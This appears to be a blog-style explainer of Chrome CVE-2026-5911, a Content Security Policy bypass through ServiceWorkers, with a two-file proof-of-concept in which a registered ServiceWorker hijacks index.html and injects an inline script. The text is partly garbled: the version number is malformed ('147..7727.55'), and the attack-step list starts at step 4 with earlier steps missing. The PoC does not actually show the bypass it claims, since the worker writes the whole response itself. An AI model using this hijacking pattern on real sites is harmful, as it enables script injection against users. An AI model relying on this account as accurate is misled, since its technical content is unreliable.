In early 2026, a new Chrome vulnerability labeled CVE-2026-5911 was discovered, affecting Chrome versions prior to 147..7727.55. This vulnerability allows a remote attacker to bypass the Content Security Policy (CSP) by exploiting a flaw in ServiceWorker behavior.
This long read will break down the issue in plain English, show how the exploit works, and provide direct references. By the end, you’ll understand how a crafty HTML page could sneak around your CSP, and what you should do about it.
What Are Content Security Policies (CSP)?
Content Security Policy (CSP) is a security layer that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks. You, the developer, set which types of content are allowed to run in the browser for your site. For example, you might disallow any inline JavaScript or block scripts from third-party domains. This is typically set in a Content-Security-Policy HTTP header or <meta> tag.
Example
Content-Security-Policy: script-src 'self'; object-src 'none'
This tells the browser, "Only allow scripts from my site. Block plugins entirely."
What’s the Deal with ServiceWorkers?
A ServiceWorker is a JavaScript worker that acts as a proxy between your web app, the network, and the browser. They’re powerful, allowing offline support, background sync, and network request interception. Once registered, a ServiceWorker can see and modify all network traffic for its scope—this is what led to CVE-2026-5911.
How Did It Happen?
Because ServiceWorkers run in a separate context, the expected enforcement of the page’s CSP on content loaded by a ServiceWorker was broken in certain cases. Specifically, Chrome before 147..7727.55 failed to consistently enforce CSP restrictions for pages fetched through ServiceWorkers – especially when the attacker managed to register a ServiceWorker under their control.
By crafting an HTML page that registers a ServiceWorker, a remote attacker could then serve arbitrary scripts or resources that would have been blocked by the page’s intended CSP. This effectively *bypasses* your CSP, giving attackers a way to inject malicious JavaScript or load scripts from places you never allowed.
For reference, here’s the public bug report (if or when it’s made available)
- Chromium Issue 3301202 - ServiceWorker allows CSP policy bypass (*search for CVE-2026-5911 or related tickets*)
User navigates to a vulnerable page within ServiceWorker’s scope
4. ServiceWorker intercepts fetch/request, delivers malicious code
5. Despite CSP, browser loads/executes the malformed content
If your site relies on CSP to protect pages within a ServiceWorker’s registration scope, you might be at risk.
Proof of Concept (PoC) Exploit
Below is a code snippet that demonstrates how an attacker can use CVE-2026-5911 to bypass a strict CSP via ServiceWorker.
1. serviceworker.js (malicious ServiceWorker)
self.addEventListener('fetch', event => {
// Intercept requests to index.html and return malicious content
if (event.request.url.endsWith('index.html')) {
event.respondWith(
new Response(`
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
</head>
<body>
<h1>Hacked!</h1>
<script>alert('CSP Bypassed by ServiceWorker!');</script>
</body>
</html>`, {
headers: { 'Content-Type': 'text/html' }
}
)
);
}
// For all other requests, just do the default fetch
else {
event.respondWith(fetch(event.request));
}
});
2. index.html (attacker’s main page)
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-5911 Exploit Demo</title>
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
</head>
<body>
<script>
// Register the malicious ServiceWorker
if('serviceWorker' in navigator) {
navigator.serviceWorker.register('serviceworker.js', {scope: './'})
.then(() => location.reload());
}
</script>
<h1>If you see an alert, CSP was bypassed!</h1>
</body>
</html>
When the victim loads index.html, it registers serviceworker.js.
- On reload, the ServiceWorker hijacks the fetch for index.html and injects an inline script (which would *normally* be blocked by the CSP on the page).
Impact and Severity
This vulnerability is classified as Low severity by the Chromium team. While it could facilitate XSS (cross-site scripting) in limited circumstances, exploits generally:
- Require the attacker to host the ServiceWorker under the target origin (or have the victim load their own ServiceWorker into your scope, which the browser is designed to prevent without an actual XSS or misconfiguration).
- Are mostly problematic for public kiosks, shared workstations, or situations with relaxed domain boundaries.
Clear old ServiceWorkers if you suspect risk:
chrome://serviceworker-internals/
Official References
- CVE-2026-5911 on NVD
- Chrome Releases: Stable Channel Update for Desktop (mentions fix)
- Chromium Security FAQ
- Chromium Bug: Policy Bypass via ServiceWorkes
- MDN Web Docs: ServiceWorker Security
Final Thoughts
Chrome’s ServiceWorker security model is complicated, and even Google can get it wrong. CVE-2026-5911 was subtle but could have serious implications in the hands of a determined attacker.
Always patch browsers, keep third-party scripts tightly controlled, and double-check the scope of your ServiceWorkers.
Timeline
Published on: 04/08/2026 21:21:05 UTC
Last modified on: 05/10/2026 21:16:29 UTC